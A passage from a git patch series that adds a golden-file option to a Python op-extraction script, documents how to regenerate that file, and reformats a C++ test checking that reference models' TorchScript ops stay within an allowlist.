@@ python3 extract_model_ops.py --cpp # Also show per-model breakdowns python3 extract_model_ops.py --per-model --cpp +# Generate the golden file for the C++ allowlist drift test +python3 extract_model_ops.py --golden \ + ../../bin/pytorch_inference/unittest/testfiles/reference_model_ops.json + # Use a custom config file python3 extract_model_ops.py --config /path/to/models.json ``` @@ -116,7 +120,37 @@ To add a new architecture, append an entry to `reference_models.json`, re-run `extract_model_ops.py --cpp`, and update `CSupportedOperations.cc`. Then add the same entry (plus any task-specific variants) to `validation_models.json` and run `validate_allowlist.py` to confirm -there are no false positives. +there are no false positives. Finally, regenerate the golden file +(see below). + +## Golden file for allowlist drift detection + +The C++ test `testAllowlistCoversReferenceModels` loads a golden JSON +file containing per-architecture op sets and verifies every op is in +`ALLOWED_OPERATIONS` and none are in `FORBIDDEN_OPERATIONS`. This +catches allowlist regressions in CI without requiring Python or network +access. + +The golden file lives at: +`bin/pytorch_inference/unittest/testfiles/reference_model_ops.json` + +### When to regenerate + +- After upgrading the PyTorch (libtorch) version. +- After adding or removing a supported architecture. +- After modifying `ALLOWED_OPERATIONS` or `FORBIDDEN_OPERATIONS`. + +### How to regenerate + +```bash +cd dev-tools/extract_model_ops +source .venv/bin/activate +python3 extract_model_ops.py --golden \ + ../../bin/pytorch_inference/unittest/testfiles/reference_model_ops.json +``` + +If the regenerated file introduces ops not in the allowlist, the C++ +test will fail until `CSupportedOperations.cc` is updated. ## How it works diff --git a/dev-tools/extract_model_ops/extract_model_ops.py b/dev-tools/extract_model_ops/extract_model_ops.py index ea56cee68..676a7ef4b 100644 --- a/dev-tools/extract_model_ops/extract_model_ops.py +++ b/dev-tools/extract_model_ops/extract_model_ops.py @@ -17,11 +17,13 @@ used to build the C++ allowlist in CSupportedOperations.h. Usage: - python3 extract_model_ops.py [--per-model] [--cpp] [--config CONFIG] + python3 extract_model_ops.py [--per-model] [--cpp] [--golden OUTPUT] [--config CONFIG] Flags: --per-model Print the op set for each model individually. --cpp Print the union as a C++ initializer list. + --golden OUTPUT Write per-model op sets as a JSON golden file for the + C++ allowlist drift test. --config CONFIG Path to the reference models JSON config file. Defaults to reference_models.json in the same directory. """ @@ -31,6 +33,8 @@ import sys from pathlib import Path +import torch + from torchscript_utils import collect_inlined_ops, load_and_trace_hf_model SCRIPT_DIR = Path(__file__).resolve().parent @@ -71,6 +75,8 @@ def main(): help="Print per-model op sets") parser.add_argument("--cpp", action="store_true", help="Print union as C++ initializer") + parser.add_argument("--golden", type=Path, default=None, metavar="OUTPUT", + help="Write per-model op sets as a JSON golden file") parser.add_argument("--config", type=Path, default=DEFAULT_CONFIG, help="Path to reference_models.json config file") args = parser.parse_args() @@ -98,6 +104,25 @@ def main(): if failed: print(f"Failed models: {', '.join(failed)}", file=sys.stderr) + if args.golden: + golden = { + "pytorch_version": torch.__version__, + "models": { + arch: { + "model_id": reference_models[arch], + "ops": sorted(ops), + } + for arch, ops in sorted(per_model_ops.items()) + }, + } + args.golden.parent.mkdir(parents=True, exist_ok=True) + with open(args.golden, "w") as f: + json.dump(golden, f, indent=2) + f.write("\n") + print(f"Wrote golden file to {args.golden} " + f"({len(per_model_ops)} models, " + f"{len(union_ops)} unique ops)", file=sys.stderr) + if args.per_model: for arch, ops in sorted(per_model_ops.items()): print(f"\n=== {arch} ({reference_models[arch]}) ===") @@ -107,7 +132,7 @@ def main(): if args.cpp: print("\n// C++ initializer for SUPPORTED_OPERATIONS:") print(format_cpp_initializer(union_ops)) - else: + elif not args.golden: print("\n// Sorted union of all operations:") for op in sorted(union_ops): print(op) From b027464dd9166c86845e7c1b3d82c12e572b07c8 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Thu, 12 Mar 2026 12:25:57 +1300 Subject: [PATCH 30/30] Fix clang-format violations in CModelGraphValidatorTest Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 20 ++++++++----------- 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index b6e521a3c..7818e88f0 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -461,7 +461,7 @@ BOOST_AUTO_TEST_CASE(testAllowlistCoversReferenceModels) { const auto& allowed = CSupportedOperations::ALLOWED_OPERATIONS; const auto& forbidden = CSupportedOperations::FORBIDDEN_OPERATIONS; - for (const auto& [arch, entry] : models) { + for (const auto & [ arch, entry ] : models) { const auto& info = entry.as_object(); const auto& ops = info.at("ops").as_array(); std::string modelId{info.at("model_id").as_string()}; @@ -469,17 +469,13 @@ BOOST_AUTO_TEST_CASE(testAllowlistCoversReferenceModels) { for (const auto& opVal : ops) { std::string op{opVal.as_string()}; - BOOST_CHECK_MESSAGE( - forbidden.count(op) == 0, - arch << " (" << modelId << "): op " << op - << " is in FORBIDDEN_OPERATIONS — a legitimate model " - << "should not use forbidden ops"); - - BOOST_CHECK_MESSAGE( - allowed.count(op) == 1, - arch << " (" << modelId << "): op " << op - << " is not in ALLOWED_OPERATIONS — update the allowlist " - << "or check if this op was introduced by a PyTorch upgrade"); + BOOST_CHECK_MESSAGE(forbidden.count(op) == 0, + arch << " (" << modelId << "): op " << op << " is in FORBIDDEN_OPERATIONS — a legitimate model " + << "should not use forbidden ops"); + + BOOST_CHECK_MESSAGE(allowed.count(op) == 1, + arch << " (" << modelId << "): op " << op << " is not in ALLOWED_OPERATIONS — update the allowlist " + << "or check if this op was introduced by a PyTorch upgrade"); } } }